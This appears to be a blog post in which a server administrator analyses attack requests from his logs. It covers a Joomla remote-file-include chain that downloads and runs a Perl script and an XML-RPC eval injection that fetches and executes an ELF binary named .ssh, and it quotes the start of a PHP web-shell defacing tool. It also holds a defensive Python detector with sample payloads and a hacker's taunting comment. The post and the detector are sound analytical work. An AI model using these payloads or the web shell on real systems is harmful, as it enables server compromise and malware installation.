I usually analyze the security logs for my web server daily, and each day I see various hacking attempts. While I do not understand what drives people to do it (this is not a political site!), I am very interested in seeing how they do it.
One or two weeks ago yet another vulnerability in Mambo/Joomla was found. A typical attack looks like this:
GET /gallery/components/com_cpg/cpg.php?mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp/;wget%20http://61.19.55.250/icons/mambo1.txt;perl%20mambo1.txt;rm%20-rf%20mambo1.*? HTTP/1.0
Host: www.*****.lv
Accept: */*
User-Agent: Mozilla/5.0
Quite obvious: the hacker relies on allow_url_fopen being enabled. PHP's include() will then fetch the file from the hacker's site over HTTP just as if it were local. The file on that server is a PHP script, which will be executed (or at least the hacker expects so) in the context of the attacked server (mine). This kind of attack is as old as the hills, and any experienced administrator disables allow_url_fopen in php.ini these days. Additionally, my server does not have Mambo, Joomla, wget or curl installed. So this particular attack came to the wrong address.
If you still cannot understand how it works, look at how the beginning of http://200.72.130.29/cmd.gif looks:
<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com
If you are going to modify the code, please keep the names of its original authors
and please get in touch with me...
Hey folks, seriously, there are a lot of jerks who simply use it; don't be just a sucker of the script,
don't be an imbecile lamer, don't be a shitty script kiddie, don't be a moron, help improve it too!!
-->
<?php
//The Rules
include("http://ess.trix.net/therules.dat");
if(empty($chdir)) $chdir = @$_GET['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
Today a fresh attack came in. Here is what I got:
POST /xmlsrv/xmlrpc.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.*****.lv
User-Agent: Internet Explorer 6.0
Content-Length: 501
<?xml version="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>',''));
system('unset HISTFILE;cd /tmp ; mkdir .... ; cd .... ; wget stadco.com/images/site/.ssh ; curl -O stadco.com/images/site/.ssh ; chmod 777 .ssh ; ./.ssh'); die; /*</name></value></param></params></methodCall>
Notice how clever it looks.
The first part, up to and including the opening quote inside the <name> element, is obviously an XML-RPC request. The six characters that follow it, ",''));", look like the closing of a function call. So the hacker found that some XML-RPC code (unknown to me) uses the PHP function eval() this way:
eval('my_another_function("$xmlrpcCall")');
Why do I think so? Look at how the PHP parser will treat this whole code. my_another_function() will definitely fail, because the XML-RPC request is invalid (it is terminated in the middle by the function-closing construct, those six characters). But eval() will then execute the rest: a system() call that fetches a file named .ssh into the current directory. ssh uses this name for its configuration, so an inexperienced administrator may skip it while searching for hacking scripts. The rest of the string makes sure that PHP does not fail, by commenting out everything after that point. If wget or curl succeeds, the downloaded .ssh file is made executable and executed. This file is not a script; it is a Linux executable (ELF).
So this attack is simple and effective. I am sometimes shocked at how creative and clever hackers can be.
This attack looks really new, because I could not find it on secunia.com, my favorite site for security announcements.
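As an added example (not part of the original post), here is a small Python log-triage script that flags both request shapes described above: a remote URL handed to an include()-style parameter, a shell command chain inside a parameter, and a PHP string breakout followed by a process-spawning call in a POST body. The sample requests are constructed for this example with RFC 5737 documentation addresses, modelled on the two quoted attacks.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Heuristics for the request shapes discussed on this page. They are indicators for
# triage, not proof of compromise; a hit means "look at this request by hand".
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
SHELL_CHAIN = re.compile(r"(?:^|[;|&`\n])\s*(?:wget|curl|perl|chmod|rm\s+-rf)\s+\S")
PHP_EXEC_CALL = re.compile(r"\)\s*;\s*(?:system|exec|passthru|shell_exec|popen|eval)\s*\(")

# Constructed samples (documentation addresses), shaped like the two attacks quoted above.
SAMPLE_REQUESTS = [
    ("GET", "/gallery/components/com_cpg/cpg.php?mosConfig_absolute_path=http://203.0.113.5/cmd.gif?"
            "&cmd=cd%20/tmp/;wget%20http://198.51.100.7/icons/mambo1.txt;perl%20mambo1.txt;rm%20-rf%20mambo1.*", ""),
    ("POST", "/xmlsrv/xmlrpc.php",
     "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><name>',''));\n"
     "system('cd /tmp ; wget 198.51.100.7/images/.ssh ; chmod 777 .ssh ; ./.ssh'); die; /*</name></value>"
     "</param></params></methodCall>"),
    ("GET", "/index.php?option=com_content&task=view&id=12", ""),  # benign control
]


def classify_request(method, target, body=""):
    """Return a list of findings for one HTTP request; an empty list means nothing matched."""
    findings = []
    query = urlsplit(target).query
    # Split on '&' by hand so the result does not depend on parse_qsl's separator handling.
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        value = unquote_plus(raw_value)
        if REMOTE_URL.match(value):
            findings.append(f"remote include via parameter {name}")
        if SHELL_CHAIN.search(value):
            findings.append(f"shell command chain in parameter {name}")
    if method == "POST" and PHP_EXEC_CALL.search(unquote_plus(body)):
        findings.append("PHP exec call after string breakout in body")
    return findings


def scan(requests):
    """Map each flagged request ("METHOD target") to its findings; clean requests are omitted."""
    report = {}
    for method, target, body in requests:
        findings = classify_request(method, target, body)
        if findings:
            report[f"{method} {target}"] = findings
    return report


if __name__ == "__main__":
    for request, findings in scan(SAMPLE_REQUESTS).items():
        print(request[:80], "->", "; ".join(findings))
```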

that's a very, very old method, and that defacement tool was made by a friend of mine some time ago now...
damn it, administrator, you need to start learning and getting involved in security...
if you keep looking at those sites like secunia.. you won't get anywhere; we all post to those sites after a while, when we decide something is not private anymore or when a lot of script kiddies get the leak.
Anyway... pz all!!
g4rf0x
Intrux-Team // Mexican Hackers
Security Research Center
greetz to Dmitry